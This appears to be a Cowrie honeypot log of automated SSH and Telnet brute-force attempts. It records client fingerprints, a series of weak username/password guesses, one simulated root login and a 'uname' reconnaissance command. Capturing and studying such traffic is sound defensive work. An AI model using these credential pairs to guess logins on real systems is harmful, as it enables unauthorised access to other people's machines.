{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:37:56.842556Z","src_ip":"212.227.125.160","session":"7737848071a2"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:37:57.100890Z","src_ip":"212.227.125.160","session":"7737848071a2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:58.251612Z","src_ip":"212.227.125.160","session":"7737848071a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57982,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d6a144a37b1","protocol":"ssh","message":"New connection: 212.227.125.160:57982 (1.2.3.4:22) [session: 3d6a144a37b1]","sensor":"my-vps","timestamp":"2025-08-31T00:38:07.194373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:38:07.195301Z","src_ip":"212.227.125.160","session":"3d6a144a37b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:38:07.268224Z","src_ip":"212.227.125.160","session":"3d6a144a37b1"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:38:07.665475Z","src_ip":"212.227.125.160","session":"3d6a144a37b1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:08.746237Z","src_ip":"212.227.125.160","session":"3d6a144a37b1"}
{"eventid":"cowrie.session.connect","src_ip":"57.129.64.219","src_port":49872,"dst_ip":"1.2.3.4","dst_port":23,"session":"3e133fa09ffe","protocol":"telnet","message":"New connection: 57.129.64.219:49872 (1.2.3.4:23) [session: 3e133fa09ffe]","sensor":"my-vps","timestamp":"2025-08-31T00:38:13.215647Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48900,"dst_ip":"1.2.3.4","dst_port":22,"session":"183fd23b572b","protocol":"ssh","message":"New connection: 212.227.235.229:48900 (1.2.3.4:22) [session: 183fd23b572b]","sensor":"my-vps","timestamp":"2025-08-31T00:38:17.129978Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47140,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed3ef0fae3e2","protocol":"ssh","message":"New connection: 212.227.125.160:47140 (1.2.3.4:22) [session: ed3ef0fae3e2]","sensor":"my-vps","timestamp":"2025-08-31T00:38:17.683247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:38:17.684188Z","src_ip":"212.227.125.160","session":"ed3ef0fae3e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:38:17.758918Z","src_ip":"212.227.125.160","session":"ed3ef0fae3e2"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:38:18.010394Z","src_ip":"212.227.125.160","session":"ed3ef0fae3e2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:38:18.059138Z","src_ip":"212.227.235.229","session":"183fd23b572b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:38:18.060541Z","src_ip":"212.227.235.229","session":"183fd23b572b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57762,"dst_ip":"1.2.3.4","dst_port":22,"session":"62a85dd6b5ac","protocol":"ssh","message":"New connection: 212.227.235.229:57762 (1.2.3.4:22) [session: 62a85dd6b5ac]","sensor":"my-vps","timestamp":"2025-08-31T00:38:18.701986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:38:18.702898Z","src_ip":"212.227.235.229","session":"62a85dd6b5ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:38:19.031749Z","src_ip":"212.227.235.229","session":"62a85dd6b5ac"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:19.160209Z","src_ip":"212.227.125.160","session":"ed3ef0fae3e2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Admin@1234","message":"login attempt [admin/Admin@1234] failed","sensor":"my-vps","timestamp":"2025-08-31T00:38:20.288609Z","src_ip":"212.227.235.229","session":"62a85dd6b5ac"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:21.591735Z","src_ip":"212.227.235.229","session":"62a85dd6b5ac"}
{"eventid":"cowrie.login.failed","username":"backup","password":"letmein","message":"login attempt [backup/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T00:38:23.793616Z","src_ip":"212.227.235.229","session":"183fd23b572b"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:25.722362Z","src_ip":"212.227.235.229","session":"183fd23b572b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47446,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bf642b2d4ba","protocol":"ssh","message":"New connection: 212.227.125.160:47446 (1.2.3.4:22) [session: 4bf642b2d4ba]","sensor":"my-vps","timestamp":"2025-08-31T00:38:27.984394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:38:27.985294Z","src_ip":"212.227.125.160","session":"4bf642b2d4ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:38:28.058200Z","src_ip":"212.227.125.160","session":"4bf642b2d4ba"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-31T00:38:28.277879Z","src_ip":"212.227.125.160","session":"4bf642b2d4ba"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:29.455542Z","src_ip":"212.227.125.160","session":"4bf642b2d4ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40316,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eefce686571","protocol":"ssh","message":"New connection: 212.227.125.160:40316 (1.2.3.4:22) [session: 9eefce686571]","sensor":"my-vps","timestamp":"2025-08-31T00:38:38.265333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:38:38.266101Z","src_ip":"212.227.125.160","session":"9eefce686571"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:38:38.338361Z","src_ip":"212.227.125.160","session":"9eefce686571"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T00:38:38.673532Z","src_ip":"212.227.125.160","session":"9eefce686571"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39904,"dst_ip":"1.2.3.4","dst_port":22,"session":"56d68f88571c","protocol":"ssh","message":"New connection: 212.227.125.160:39904 (1.2.3.4:22) [session: 56d68f88571c]","sensor":"my-vps","timestamp":"2025-08-31T00:38:38.978027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:38:39.508140Z","src_ip":"212.227.125.160","session":"56d68f88571c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:38:39.508885Z","src_ip":"212.227.125.160","session":"56d68f88571c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:39.823170Z","src_ip":"212.227.125.160","session":"9eefce686571"}
{"eventid":"cowrie.login.failed","username":"backup","password":"letmein","message":"login attempt [backup/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T00:38:41.826585Z","src_ip":"212.227.125.160","session":"56d68f88571c"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:43.235061Z","src_ip":"212.227.125.160","session":"56d68f88571c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39302,"dst_ip":"1.2.3.4","dst_port":22,"session":"92d439ca054d","protocol":"ssh","message":"New connection: 212.227.125.160:39302 (1.2.3.4:22) [session: 92d439ca054d]","sensor":"my-vps","timestamp":"2025-08-31T00:38:48.683260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:38:48.684345Z","src_ip":"212.227.125.160","session":"92d439ca054d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:38:48.757394Z","src_ip":"212.227.125.160","session":"92d439ca054d"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-31T00:38:48.999298Z","src_ip":"212.227.125.160","session":"92d439ca054d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:38:50.079901Z","src_ip":"212.227.125.160","session":"92d439ca054d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56590,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a713fd063ce","protocol":"ssh","message":"New connection: 212.227.125.160:56590 (1.2.3.4:22) [session: 7a713fd063ce]","sensor":"my-vps","timestamp":"2025-08-31T00:38:59.151490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:38:59.152248Z","src_ip":"212.227.125.160","session":"7a713fd063ce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:38:59.227191Z","src_ip":"212.227.125.160","session":"7a713fd063ce"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:38:59.485720Z","src_ip":"212.227.125.160","session":"7a713fd063ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:38:59.841243Z","src_ip":"212.227.125.160","session":"7a713fd063ce"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:38:59.842012Z","src_ip":"212.227.125.160","session":"7a713fd063ce"}
